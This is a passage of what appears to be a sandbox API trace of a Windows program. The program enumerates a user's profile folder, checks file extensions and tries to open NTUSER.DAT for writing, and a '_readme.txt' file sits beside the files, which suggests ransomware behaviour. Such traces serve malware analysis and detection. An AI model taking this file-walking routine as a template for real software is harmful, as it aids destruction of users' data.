| out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cab400, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1e057380, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x1e057380, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd93ece20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd93ece20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd94853a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd94853a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0201.690] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x434de280, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x434de280, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0201.690] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0201.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x434b8120, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0201.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0201.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0201.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0201.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0201.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0201.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0201.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0201.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0201.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0201.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0201.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0201.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad377e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad377e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0201.691] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0201.692] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0201.692] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0201.692] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0201.692] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0201.692] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdab224a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdab224a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0201.692] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88cab400, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cd1560, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0201.692] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384650 | out: hHeap=0x2c0000) returned 1 [0201.692] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88cab400, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cd1560, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0201.692] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.692] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.692] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9318 | out: hHeap=0x2c0000) returned 1 [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66370 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66348 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66320 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b662f8 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b662d0 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b662a8 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66280 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66258 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66230 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66208 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b660a0 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66578 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b665a0 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b665c8 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b665f0 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66618 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66640 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66668 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66690 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceca8 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670b0 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670e8 | out: 